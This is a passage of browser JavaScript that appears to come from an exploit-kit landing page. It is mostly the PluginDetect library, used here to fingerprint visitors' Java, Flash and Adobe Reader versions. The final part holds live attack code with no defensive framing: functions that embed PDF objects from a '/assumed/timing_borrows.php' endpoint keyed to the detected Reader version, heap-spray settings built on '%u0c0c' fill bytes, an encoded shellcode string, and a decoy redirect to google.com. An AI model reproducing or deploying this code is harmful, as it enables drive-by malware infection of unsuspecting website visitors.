  949.           var k = this , g = k.$, d = k.$$, j, l, h, m = {
  950.           }
  951.           , f = {
  952.           }
  953.           , a, c = null, i = null, b = (k.hasRun || k.disabled());
  954.           k.hasRun = 1;
  955.           if (b){
  956.             return k
  957.           }
  958.           k.status = 0;
  959.           if (g.isIE && 6 <= g.verIE){
  960.             for (l = 0; l < k.classID.length; l ++ ){
  961.               k.HTML = g.insertHTML("object", ["classid", k.classID[l]], []);
  962.               c = g.getDOMobj(k.HTML);
  963.               try {
  964.                 if (c && c.jvms){
  965.                   break
  966.                 }
  967.               }
  968.               catch (j){
  969.               }
  970.             }
  971.           }
  972.           else {
  973.             if (!g.isIE && (h = g.hasMimeType(k.mimeType)) && h.type){
  974.               k.HTML = g.insertHTML("object", ["type", h.type], []);
  975.               c = g.getDOMobj(k.HTML)
  976.             }
  977.           }
  978.           if (c){
  979.             try {
  980.               a = c.jvms;
  981.               if (a){
  982.                 i = a.getLength();
  983.                 if (g.isNum(i)){
  984.                   k.status = 0 < i ? 1 :- 1;
  985.                   for (l = 0; l < i; l ++ ){
  986.                     h = g.getNum(a.get(i - 1 - l).version);
  987.                     if (h){
  988.                       k.VERSIONS.push(h);
  989.                       f["a" + g.formatNum(h)] = 1
  990.                     }
  991.                   }
  992.                 }
  993.               }
  994.             }
  995.             catch (j){
  996.             }
  997.           }
  998.           h = 0;
  999.           for (lin f){
  1000.             h ++
  1001.           }
  1002.           if (h && h !== k.VERSIONS.length){
  1003.             k.VERSIONS = []
  1004.           }
  1005.           if (k.VERSIONS.length){
  1006.             k.version = g.formatNum(k.VERSIONS[0])
  1007.           }
  1008.           ;
  1009.           return k
  1010.         }
  1011.       }
  1012.       , AXO : {
  1013.         $ : 1, hasRun : 0, VERSIONS : [], version : "", disabled : function (){
  1014.           return this .$$.isDisabled.AXO()
  1015.         }
  1016.         , JavaVersions : [[1, 9, 1, 40], [1, 8, 1, 40], [1, 7, 1, 40], [1, 6, 0, 40], [1,
  1017.         5, 0, 30], [1, 4, 2, 30], [1, 3, 1, 30]], query : function (){
  1018.           var a = this , e = a.$, b = a.$$, c = (a.hasRun || a.disabled());
  1019.           a.hasRun = 1;
  1020.           if (c){
  1021.             return a
  1022.           }
  1023.           var i = [], k = [1, 5, 0, 14], j = [1, 6, 0, 2], h = [1, 3, 1, 0], g = [1, 4, 2,
  1024.           0], f = [1, 5, 0, 7], d = b.getInfo ? true : false, l = {
  1025.           }
  1026.           ;
  1027.           if (b.minIEver <= e.verIE){
  1028.             i = a.search(j, j, d);
  1029.             if (0 < i.length && d){
  1030.               i = a.search(k, k, d)
  1031.             }
  1032.           }
  1033.           else {
  1034.             if (d){
  1035.               i = a.search(f, f, true)
  1036.             }
  1037.             if (i.length == 0){
  1038.               i = a.search(h, g, false)
  1039.             }
  1040.           }
  1041.           if (i.length){
  1042.             a.version = i[0];
  1043.             a.VERSIONS = [].concat(i)
  1044.           }
  1045.           ;
  1046.           return a
  1047.         }
  1048.         , search : function (a, j, p){
  1049.           var h, d, f = this , e = f.$, k = f.$$, n, c, l, q, b, o, r, i = [];
  1050.           if (0 < e.compareNums(a.join(","), j.join(","))){
  1051.             j = a
  1052.           }
  1053.           j = e.formatNum(j.join(","));
  1054.           var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + (0
  1055.            < a[3] ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
  1056.           for (h = 0; h < f.JavaVersions.length; h ++ ){
  1057.             d = f.JavaVersions[h];
  1058.             n = "JavaPlugin." + d[0] + "" + d[1];
  1059.             b = d[0] + "." + d[1] + ".";
  1060.             for (l = d[2];
  1061.             l >= 0; l -- ){
  1062.               r = "JavaWebStart.isInstalled." + b + l + ".0";
  1063.               if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO(r
  1064.               )){
  1065.                 continue
  1066.               }
  1067.               m = 0 > e.compareNums(d[0] + "," + d[1] + "," + l + ",0", s) ? true : false;
  1068.               for (q = d[3];
  1069.               q >= 0; q -- ){
  1070.                 c = l + "_" + (q < 10 ? "0" + q : q);
  1071.                 o = n + c;
  1072.                 if (e.getAXO(o) && (m || e.getAXO(r))){
  1073.                   i.push(b + c);
  1074.                   if (!p){
  1075.                     return i
  1076.                   }
  1077.                 }
  1078.                 if (o == g){
  1079.                   return i
  1080.                 }
  1081.               }
  1082.               if (e.getAXO(n + l) && (m || e.getAXO(r))){
  1083.                 i.push(b + l);
  1084.                 if (!p){
  1085.                   return i
  1086.                 }
  1087.               }
  1088.               if (n + l == g){
  1089.                 return i
  1090.               }
  1091.             }
  1092.           }
  1093.           return i
  1094.         }
  1095.       }
  1096.       , navMime : {
  1097.         $ : 1, hasRun : 0, mimetype : "", version : "", length : 0, mimeObj : 0, pluginObj
  1098.          : 0, disabled : function (){
  1099.           return this .$$.isDisabled.navMime()
  1100.         }
  1101.         , query : function (){
  1102.           var i = this , f = i.$, a = i.$$, b = (i.hasRun || i.disabled());
  1103.           i.hasRun = 1;
  1104.           if (b){
  1105.             return i
  1106.           }
  1107.           ;
  1108.           var n =/^\ s * application \/ x - java - applet;
  1109.           jpi - version \ s *=\ s * ( \ d. * )$ / i, g, l, j, d = "", h = "a", o, m, k =
  1110.           {
  1111.           }
  1112.           , c = f.formatNum("0");
  1113.           for (l = 0; l < navigator.mimeTypes.length; l ++ ){
  1114.             o = navigator.mimeTypes[l];
  1115.             m = o ? o.enabledPlugin : 0;
  1116.             g = o && n.test(o.type || d) ? f.formatNum(f.getNum(RegExp.$1)) : 0;
  1117.             if (g && m && (m.description || m.name)){
  1118.               if (!k[h + g]){
  1119.                 i.length ++
  1120.               }
  1121.               k[h + g] = o.type;
  1122.               if (0 < f.compareNums(g, c)){
  1123.                 c = g
  1124.               }
  1125.             }
  1126.           }
  1127.           g = k[h + c];
  1128.           if (g){
  1129.             o = f.hasMimeType(g);
  1130.             i.mimeObj = o;
  1131.             i.pluginObj = o ? o.enabledPlugin : 0;
  1132.             i.mimetype = g;
  1133.             i.version = c
  1134.           }
  1135.           ;
  1136.           return i
  1137.         }
  1138.       }
  1139.       , navPlugin : {
  1140.         $ : 1, hasRun : 0, version : "", disabled : function (){
  1141.           return this .$$.isDisabled.navPlugin()
  1142.         }
  1143.         , query : function (){
  1144.           var m = this , e = m.$, c = m.$$, h = c.navigator, j, l, k, g, d, a, i, f = 0, b
  1145.            = (m.hasRun || m.disabled());
  1146.           m.hasRun = 1;
  1147.           if (b){
  1148.             return m
  1149.           }
  1150.           ;
  1151.           a = h.pluginObj.name || "";
  1152.           i = h.pluginObj.description || "";
  1153.           if (!f || c.debug){
  1154.             g =/ Java. * TM. * Platform[ ^\ d] * ( \ d + )( ?: [ \ ., _]( \ d * )) ? ( ?:\
  1155.             s * [Update] +\ s * ( \ d * )) ?/ i;
  1156.             if ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 10) >= 5){
  1157.               f = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp.
  1158.               $3 ? RegExp.$3 : "0")
  1159.             }
  1160.           }
  1161.           if (!f || c.debug){
  1162.             g =/ Java[ ^\ d] * Plug - in  / i;
  1163.             l = g.test(i) ? e.formatNum(e.getNum(i)) : 0;
  1164.             k = g.test(a) ? e.formatNum(e.getNum(a)) : 0;
  1165.             if (l && (e.compareNums(l, e.formatNum("1,3")) < 0 || e.compareNums(l, e.
  1166.             formatNum("2")) >= 0)){
  1167.               l = 0
  1168.             }
  1169.             if (k && (e.compareNums(k, e.formatNum("1,3")) < 0 || e.compareNums(k, e.
  1170.             formatNum("2")) >= 0)){
  1171.               k = 0
  1172.             }
  1173.             d = l && k ? (0 < e.compareNums(l, k) ? l : k) : (l || k);
  1174.             if (d){
  1175.               f = d
  1176.             }
  1177.           }
  1178.           if (!f && e.isSafari && e.OS == 2){
  1179.             j = e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa", 0);
  1180.             if (j){
  1181.               l = e.getNum(j.description);
  1182.               if (l){
  1183.                 f = l
  1184.               }
  1185.             }
  1186.           }
  1187.           ;
  1188.           if (f){
  1189.             m.version = e.formatNum(f)
  1190.           }
  1191.           ;
  1192.           return m
  1193.         }
  1194.       }
  1195.       , lang : {
  1196.         $ : 1, System : {
  1197.           $ : 1, hasRun : 0, result : [null, null], disabled : function (){
  1198.             return this .$$.isDisabled.windowDotJava()
  1199.           }
  1200.           , getPropertyHas : function (a){
  1201.             var b = this , d = b.$, c = b.getProperty()[0];
  1202.             return (a && c && d.compareNums(d.formatNum(a), d.formatNum(c)) === 0) ? 1 : 0
  1203.           }
  1204.           , getProperty : function (){
  1205.             var f = this , g = f.$, d = f.$$, i, h = {
  1206.             }
  1207.             , b = f.hasRun || f.disabled();
  1208.             f.hasRun = 1;
  1209.             if (!b){
  1210.               var a = "java_qqq990";
  1211.               g[a] = null;
  1212.               try {
  1213.                 var c = document.createElement("script");
  1214.                 c.type = "text/javascript";
  1215.                 c.appendChild(document.createTextNode('
  1216. (function(){var e,a;try{a=[window.java.lang.System.getProperty("java.version")+" ",window.
  1217. java.lang.System.getProperty("java.vendor")+" "]}catch(e){};' + g.name + "." + a +
  1218.                 "=a||0})();"));
  1219.                 g.head.insertBefore(c, g.head.firstChild);
  1220.                 g.head.removeChild(c)
  1221.               }
  1222.               catch (i){
  1223.               }
  1224.               if (g[a] && g.isArray(g[a])){
  1225.                 f.result = [].concat(g[a])
  1226.               }
  1227.             }
  1228.             return f.result
  1229.           }
  1230.         }
  1231.       }
  1232.       , applet : {
  1233.         $ : 1, results : [[null, null], [null, null], [null, null]], getResult : function
  1234.         (){
  1235.           var c = this .results, a, b = [];
  1236.           for (a = 0; a < c.length; a ++ ){
  1237.             b = c[a];
  1238.             if (b[0]){
  1239.               break
  1240.             }
  1241.           }
  1242.           return [].concat(b)
  1243.         }
  1244.         , HTML : [0, 0, 0], active : [0, 0, 0], DummyObjTagHTML : 0, DummySpanTagHTML : 0,
  1245.         allowed : [1, 1, 1], VerifyTagsHas : function (c){
  1246.           var d = this , b;
  1247.           for (b = 0; b < d.allowed.length; b ++ ){
  1248.             if (d.allowed[b] === c){
  1249.               return 1
  1250.             }
  1251.           }
  1252.           return 0
  1253.         }
  1254.         , saveAsVerifyTagsArray : function (c){
  1255.           var b = this , d = b.$, a;
  1256.           if (d.isArray(c)){
  1257.             for (a = 0; a < b.allowed.length; a ++ ){
  1258.               if (d.isNum(c[a])){
  1259.                 if (0 > c[a]){
  1260.                   c[a] = 0
  1261.                 }
  1262.                 if (c[a] > 3){
  1263.                   c[a] = 3
  1264.                 }
  1265.                 b.allowed[a] = c[a]
  1266.               }
  1267.             }
  1268.           }
  1269.         }
  1270.         , setVerifyTagsArray : function (d){
  1271.           var b = this , c = b.$, a = b.$$;
  1272.           if (a.getVersionDone === null){
  1273.             b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())
  1274.           }
  1275.           if (a.debug || (a.verify && a.verify.isEnabled())){
  1276.             b.saveAsVerifyTagsArray([3, 3, 3])
  1277.           }
  1278.           else {
  1279.             if (d){
  1280.               b.saveAsVerifyTagsArray(d)
  1281.             }
  1282.           }
  1283.         }
  1284.         , allDisabled : function (){
  1285.           return this .$$.isDisabled.allApplets()
  1286.         }
  1287.         , isDisabled : function (d){
  1288.           var b = this , c = b.$, a = b.$$;
  1289.           if (d == 2 &&! c.isIE){
  1290.             return 1
  1291.           }
  1292.           if (d === 0 || d == 2){
  1293.             return a.isDisabled.ObjectTag()
  1294.           }
  1295.           if (d == 1){
  1296.             return a.isDisabled.AppletTag()
  1297.           }
  1298.         }
  1299.         , can_Insert_Query : function (b){
  1300.           var a = this ;
  1301.           if (a.HTML[b]){
  1302.             return 0
  1303.           }
  1304.           return !a.isDisabled(b)
  1305.         }
  1306.         , can_Insert_Query_Any : function (){
  1307.           var b = this , a;
  1308.           for (a = 0; a < b.results.length; a ++ ){
  1309.             if (b.can_Insert_Query(a)){
  1310.               return 1
  1311.             }
  1312.           }
  1313.           return 0
  1314.         }
  1315.         , should_Insert_Query : function (d){
  1316.           var b = this , e = b.allowed, c = b.$, a = b.$$;
  1317.           if (!b.can_Insert_Query(d)){
  1318.             return 0
  1319.           }
  1320.           if (e[d] == 3){
  1321.             return 1
  1322.           }
  1323.           if (e[d] == 2.8 &&! b.getResult()[0]){
  1324.             return 1
  1325.           }
  1326.           if (e[d] == 2.5 &&! a.lang.System.getProperty()[0]){
  1327.             return 1
  1328.           }
  1329.           if (e[d] == 2.2 &&! a.lang.System.getProperty()[0] &&! b.getResult()[0]){
  1330.             return 1
  1331.           }
  1332.           if (!a.nonAppletDetectionOk(a.version0)){
  1333.             if (e[d] == 2){
  1334.               return 1
  1335.             }
  1336.             if (e[d] == 1 &&! b.getResult()[0]){
  1337.               return 1
  1338.             }
  1339.           }
  1340.           return 0
  1341.         }
  1342.         , should_Insert_Query_Any : function (){
  1343.           var b = this , a;
  1344.           for (a = 0; a < b.allowed.length; a ++ ){
  1345.             if (b.should_Insert_Query(a)){
  1346.               return 1
  1347.             }
  1348.           }
  1349.           return 0
  1350.         }
  1351.         , query : function (f){
  1352.           var h, a = this , g = a.$, d = a.$$, i = null, j = null, b = a.results, c;
  1353.           if ((b[f][0] && b[f][1]) || (d.debug && d.OTF < 3)){
  1354.             return
  1355.           }
  1356.           c = g.getDOMobj(a.HTML[f], true);
  1357.           if (c){
  1358.             try {
  1359.               i = g.getNum(c.getVersion() + " ");
  1360.               j = c.getVendor() + " ";
  1361.               c.statusbar(g.winLoaded ? " " : " ")
  1362.             }
  1363.             catch (h){
  1364.             }
  1365.             if (i && g.isStrNum(i)){
  1366.               b[f] = [i, j]
  1367.             }
  1368.             else {
  1369.             }
  1370.             ;
  1371.             try {
  1372.               if (g.isIE && i && c.readyState != 4){
  1373.                 g.garbage = true;
  1374.                 c.parentNode.removeChild(c)
  1375.               }
  1376.             }
  1377.             catch (h){
  1378.             }
  1379.           }
  1380.         }
  1381.         , insert_Query_Any : function (){
  1382.           var d = this , i = d.$, e = d.$$, l = d.results, p = d.HTML, a =
  1383.           "&nbsp;&nbsp;&nbsp;&nbsp;", g = "A.class", m = i.file.getValid(e);
  1384.           if (!m){
  1385.             return d.getResult()
  1386.           }
  1387.           if (e.OTF < 1){
  1388.             e.OTF = 1
  1389.           }
  1390.           if (d.allDisabled()){
  1391.             return d.getResult()
  1392.           }
  1393.           if (e.OTF < 1.5){
  1394.             e.OTF = 1.5
  1395.           }
  1396.           var j = m.name + m.ext, h = m.path;
  1397.           var f = ["archive", j, "code", g], c = ["mayscript", "true"], o = ["scriptable",
  1398.           "true"].concat(c), n = e.navigator, b =! i.isIE && n.mimeObj && n.mimeObj.type ?
  1399.           n.mimeObj.type : e.mimeType[0];
  1400.           if (d.should_Insert_Query(0)){
  1401.             if (e.OTF < 2){
  1402.               e.OTF = 2
  1403.             }
  1404.             ;
  1405.             p[0] = i.isIE ? i.insertHTML("object", ["type", b], ["codebase", h].concat(f).
  1406.             concat(o), a, e) : i.insertHTML("object", ["type", b], ["codebase", h].concat(
  1407.             f).concat(o), a, e);
  1408.             l[0] = [0, 0];
  1409.             d.query(0)
  1410.           }
  1411.           if (d.should_Insert_Query(1)){
  1412.             if (e.OTF < 2){
  1413.               e.OTF = 2
  1414.             }
  1415.             ;
  1416.             p[1] = i.isIE ? i.insertHTML("applet", ["alt", a].concat(c).concat(f), [
  1417.             "codebase", h].concat(c), a, e) : i.insertHTML("applet", ["codebase", h, "alt"
  1418.             , a].concat(c).concat(f), [].concat(c), a, e);
  1419.             l[1] = [0, 0];
  1420.             d.query(1)
  1421.           }
  1422.           if (d.should_Insert_Query(2)){
  1423.             if (e.OTF < 2){
  1424.               e.OTF = 2
  1425.             }
  1426.             ;
  1427.             p[2] = i.isIE ? i.insertHTML("object", ["classid", e.classID], ["codebase", h
  1428.             ].concat(f).concat(o), a, e) : i.insertHTML();
  1429.             l[2] = [0, 0];
  1430.             d.query(2)
  1431.           }
  1432.           if (!d.DummyObjTagHTML &&! e.isDisabled.ObjectTag()){
  1433.             d.DummyObjTagHTML = i.insertHTML("object", [], [], a)
  1434.           }
  1435.           if (!d.DummySpanTagHTML){
  1436.             d.DummySpanTagHTML = i.insertHTML("", [], [], a)
  1437.           }
  1438.           ;
  1439.           var k = e.NOTF;
  1440.           if (e.OTF < 3 && k.shouldContinueQuery()){
  1441.             e.OTF = 3;
  1442.             k.onIntervalQuery = i.handler(k.$$onIntervalQuery, k);
  1443.             if (!i.winLoaded){
  1444.               i.WLfuncs0.push([k.winOnLoadQuery, k])
  1445.             }
  1446.             setTimeout(k.onIntervalQuery, k.intervalLength)
  1447.           }
  1448.           ;
  1449.           return d.getResult()
  1450.         }
  1451.       }
  1452.       , NOTF : {
  1453.         $ : 1, count : 0, countMax : 25, intervalLength : 250, shouldContinueQuery :
  1454.         function (){
  1455.           var e = this , d = e.$, c = e.$$, b = c.applet, a;
  1456.           for (a = 0; a < b.results.length; a ++ ){
  1457.             if (b.HTML[a] &&! b.results[a][0] && (b.allowed[a] >= 2 || (b.allowed[a] == 1
  1458.              &&! b.getResult()[0])) && e.isAppletActive(a) >= 0){
  1459.               return 1
  1460.             }
  1461.           }
  1462.           return 0
  1463.         }
  1464.         , isJavaActive : function (d){
  1465.           var f = this , c = f.$$, a, b, e =- 9;
  1466.           for (a = 0; a < c.applet.HTML.length; a ++ ){
  1467.             b = f.isAppletActive(a, d);
  1468.             if (b > e){
  1469.               e = b
  1470.             }
  1471.           }
  1472.           return e
  1473.         }
  1474.         , isAppletActive : function (c, a){
  1475.           var d = this , b = d.$$.applet.active;
  1476.           if (!a){
  1477.             b[c] = d.isAppletActive_(c)
  1478.           }
  1479.           return b[c]
  1480.         }
  1481.         , isAppletActive_ : function (d){
  1482.           var g = this , f = g.$, b = g.$$, l = b.navigator, a = b.applet, h = a.HTML[d],
  1483.           i, k, c = 0, j = f.getTagStatus(h, a.DummySpanTagHTML, a.DummyObjTagHTML, g.
  1484.           count);
  1485.           if (j ==- 2){
  1486.             return  - 2
  1487.           }
  1488.           try {
  1489.             if (f.isIE && b.minIEver <= f.verIE && f.getDOMobj(h).object){
  1490.               return 1
  1491.             }
  1492.           }
  1493.           catch (i){
  1494.           }
  1495.           for (k = 0; k < a.active.length; k ++ ){
  1496.             if (0 < a.active[k]){
  1497.               c = 1
  1498.             }
  1499.           }
  1500.           if (j == 1 && (f.isIE || ((b.version0 && l.javaEnabled() && l.mimeObj && (h.
  1501.           tagName == "object" || c)) || b.lang.System.getProperty()[0]))){
  1502.             return 1
  1503.           }
  1504.           if (0 > j){
  1505.             return  - 1
  1506.           }
  1507.           return 0
  1508.         }
  1509.         , winOnLoadQuery : function (c, d){
  1510.           var b = d.$$, a;
  1511.           if (b.OTF == 3){
  1512.             a = d.queryAllApplets();
  1513.             d.queryCompleted(a[1], a[2])
  1514.           }
  1515.         }
  1516.         , $$onIntervalQuery : function (d){
  1517.           var c = d.$, b = d.$$, a;
  1518.           if (b.OTF == 3){
  1519.             a = d.queryAllApplets();
  1520.             if (!d.shouldContinueQuery() || (c.winLoaded && d.count > d.countMax)){
  1521.               d.queryCompleted(a[1], a[2])
  1522.             }
  1523.           }
  1524.           d.count++;
  1525.           if (b.OTF == 3){
  1526.             setTimeout(d.onIntervalQuery, d.intervalLength)
  1527.           }
  1528.         }
  1529.         , queryAllApplets : function (){
  1530.           var g = this , f = g.$, e = g.$$, d = e.applet, b, a, c;
  1531.           for (b = 0; b < d.results.length; b ++ ){
  1532.             d.query(b)
  1533.           }
  1534.           a = d.getResult();
  1535.           c = a[0] ? true : false;
  1536.           return [c, a[0], a[1]]
  1537.         }
  1538.         , queryCompleted : function (c, f){
  1539.           var e = this , d = e.$, b = e.$$;
  1540.           if (b.OTF >= 4){
  1541.             return
  1542.           }
  1543.           b.OTF = 4;
  1544.           var a = e.isJavaActive();
  1545.           b.setPluginStatus(c, f, 0);
  1546.           if (b.funcs){
  1547.             d.callArray(b.funcs)
  1548.           }
  1549.           if (d.onDoneEmptyDiv){
  1550.             d.onDoneEmptyDiv()
  1551.           }
  1552.         }
  1553.       }
  1554.       , zz : 0
  1555.     }
  1556.     , flash : {
  1557.       mimeType : "application/x-shockwave-flash", progID : "ShockwaveFlash.ShockwaveFlash"
  1558.       , classID : "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000", getVersion : function (){
  1559.         var b = function (i){
  1560.           if (!i){
  1561.             return null
  1562.           }
  1563.           var e =/ [ \ d][ \ d \,\ . \ s] * [rRdD]{
  1564.             0, 1
  1565.           }
  1566.           [ \ d \, ] */ .exec(i);
  1567.           return e ? e[0].replace(/[rRdD\.]/g, ",").replace(/\s/g, "") : null
  1568.         }
  1569.         ;
  1570.         var j = this , g = j.$, k, h, l = null, c = null, a = null, f, m, d;
  1571.         if (!g.isIE){
  1572.           m = g.hasMimeType(j.mimeType);
  1573.           if (m){
  1574.             f = g.getDOMobj(g.insertHTML("object", ["type", j.mimeType], [], "", j));
  1575.             try {
  1576.               l = g.getNum(f.GetVariable("$version"))
  1577.             }
  1578.             catch (k){
  1579.             }
  1580.           }
  1581.           if (!l){
  1582.             d = m ? m.enabledPlugin : null;
  1583.             if (d && d.description){
  1584.               l = b(d.description)
  1585.             }
  1586.             if (l){
  1587.               l = g.getPluginFileVersion(d, l)
  1588.             }
  1589.           }
  1590.         }
  1591.         else {
  1592.           for (h = 15; h > 2; h -- ){
  1593.             c = g.getAXO(j.progID + "." + h);
  1594.             if (c){
  1595.               a = h.toString();
  1596.               break
  1597.             }
  1598.           }
  1599.           if (!c){
  1600.             c = g.getAXO(j.progID)
  1601.           }
  1602.           if (a == "6"){
  1603.             try {
  1604.               c.AllowScriptAccess = "always"
  1605.             }
  1606.             catch (k){
  1607.               return "6,0,21,0"
  1608.             }
  1609.           }
  1610.           try {
  1611.             l = b(c.GetVariable("$version"))
  1612.           }
  1613.           catch (k){
  1614.           }
  1615.           if (!l && a){
  1616.             l = a
  1617.           }
  1618.         }
  1619.         j.installed = l ? 1 :- 1;
  1620.         j.version = g.formatNum(l);
  1621.         return true
  1622.       }
  1623.     }
  1624.     , adobereader : {
  1625.       mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
  1626.       "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
  1627.       {
  1628.       }
  1629.       , pluginHasMimeType : function (d, c, f){
  1630.         var b = this , e = b.$, a;
  1631.         for (ain d){
  1632.           if (d[a] && d[a].type && d[a].type == c){
  1633.             return 1
  1634.           }
  1635.         }
  1636.         if (e.getMimeEnabledPlugin(c, f)){
  1637.           return 1
  1638.         }
  1639.         return 0
  1640.       }
  1641.       , getVersion : function (l, j){
  1642.         var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
  1643.         if (d.isString(j)){
  1644.           j = j.replace(/\s/g, "");
  1645.           if (j){
  1646.             k = j
  1647.           }
  1648.         }
  1649.         else {
  1650.           j = null
  1651.         }
  1652.         if (d.isDefined(g.INSTALLED[k])){
  1653.           g.installed = g.INSTALLED[k];
  1654.           return
  1655.         }
  1656.         if (!d.isIE){
  1657.           a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
  1658.           if (g.getVersionDone !== 0){
  1659.             g.getVersionDone = 0;
  1660.             b = d.getMimeEnabledPlugin(g.mimeType, a);
  1661.             if (!j){
  1662.               n = b
  1663.             }
  1664.             if (!b && d.hasMimeType(g.mimeType)){
  1665.               b = d.findNavPlugin(a, 0)
  1666.             }
  1667.             if (b){
  1668.               g.navPluginObj = b;
  1669.               h = d.getNum(b.description) || d.getNum(b.name);
  1670.               h = d.getPluginFileVersion(b, h);
  1671.               if (!h && d.OS == 1){
  1672.                 if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
  1673.                   h = "9"
  1674.                 }
  1675.                 else {
  1676.                   if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
  1677.                     h = "8"
  1678.                   }
  1679.                 }
  1680.               }
  1681.             }
  1682.           }
  1683.           else {
  1684.             h = g.version
  1685.           }
  1686.           if (!d.isDefined(n)){
  1687.             n = d.getMimeEnabledPlugin(k, a)
  1688.           }
  1689.           g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
  1690.         }
  1691.         else {
  1692.           b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
  1693.           c =/=\ s * ([ \ d \ .] + ) / g;
  1694.           try {
  1695.             f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
  1696.             ""], "", g))).GetVersions();
  1697.             for (m = 0; m < 5; m ++ ){
  1698.               if (c.test(f) && (!h || h < RegExp.$1)){
  1699.                 h = RegExp.$1
  1700.               }
  1701.             }
  1702.           }
  1703.           catch (i){
  1704.           }
  1705.           g.installed = h ? 1 : (b ? 0 :- 1)
  1706.         }
  1707.         if (!g.version){
  1708.           g.version = d.formatNum(h)
  1709.         }
  1710.         g.INSTALLED[k] = g.installed
  1711.       }
  1712.     }
  1713.     , zz : 0
  1714.   }
  1715. }
  1716. ;
  1717. PluginDetect.initScript();
  1718. PluginDetect.getVersion(".");
  1719. var $$ = PluginDetect;
  1720. function x(s){
  1721.   d = [];
  1722.   for (i = 0; i < s.length; i ++ ){
  1723.     k = (s.charCodeAt(i)).toString(33);
  1724.     d.push(k);
  1725.   }
  1726.   ;
  1727.   return d.join(":");
  1728. }
  1729. end_redirect = function (){
  1730.   window.location.href = 'http://google.com';
  1731. }
  1732. ;
  1733. function j1(){
  1734.   return true;
  1735. }
  1736. function j2(){
  1737.   return true;
  1738. }
  1739. function p1(){
  1740.   var d = document.createElement("object");
  1741.   d.setAttribute("data", "/assumed/timing_borrows.php?wkqavggu=" + x("c833f") + "&pqu=" +
  1742.   x("cat") +
  1743.   "&mblwxwdx=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ludkpgbm=" +
  1744.   x(pdfver.join(".")));
  1745.   d.setAttribute("type", "application/pdf");
  1746.   document.body.appendChild(d);
  1747. }
  1748. function p2(){
  1749.   var d = document.createElement("object");
  1750.   d.setAttribute("data", "/assumed/timing_borrows.php?ggtmfzl=" + x("c833f") +
  1751.   "&lddsvzbu=" + x("r") +
  1752.   "&pznkfzh=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&wnq=" + x(
  1753.   pdfver.join(".")));
  1754.   d.setAttribute("type", "application/pdf");
  1755.   document.body.appendChild(d);
  1756. }
  1757. function f1(){
  1758.   return false;
  1759. }
  1760. function getCN(){
  1761.   return "/assumed/timing_borrows.php?jdp=" + x("c833f") + "&chjlohkh=" + x("ddova") + "&npbua=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ublfosyz=xchadllm"
  1762. }
  1763. function getBlockSize(){
  1764.   return 1024
  1765. }
  1766. function getAllocSize(){
  1767.   return 1024 * 1024
  1768. }
  1769. function getAllocCount(){
  1770.   return 300
  1771. }
  1772. function getFillBytes(){
  1773.   var a = '%u' + '0c0c';
  1774.   return a + a
  1775. }
  1776. function getShellCode(){
  1777.   var a = "
  1778. 8282!%5125!%b5e4!%d4e0!%b451!%e004!%9134!%5451!%f4e0!%2191!%91e4!%4421!%2191!%9114!%e421!%
  1779. 2191!%91f4!%8121!%21b1!%9134!%9121!%21b1!%9144!%d451!%e095!%b1b1!%1421!%2191!%9114!%6421!%
  1780. 2191!%b181!%e451!%7164!%0485!%6085!%f5b5!%a574!%74a5!%77a4!%64f4!%5414!%c514!%c470!%54d4!%
  1781. b5d5!%94b5!%2570!%a414!%e460!%f414!%7464!%7054!%2170!%c585!%04c5!%e582!%2451!%e095!%51f5!%
  1782. 05d4!%34e0!%5191!%e0f5!%b1b1!%f521!%21a1!%9144!%1421!%2191!%9174!%f421!%2191!%b181!%6421!%
  1783. 2191!%b1b1!%5421!%5191!%b5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%e4e4!%8571!%
  1784. 8504!%b560!%74f5!%a5a5!%a474!%f477!%1464!%1454!%70c5!%d4c4!%d554!%b5b5!%7094!%1425!%60a4!%
  1785. 14e4!%64f4!%5474!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%
  1786. 6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%
  1787. b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%
  1788. 2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%
  1789. fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%
  1790. fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%
  1791. 7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%
  1792. 3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%
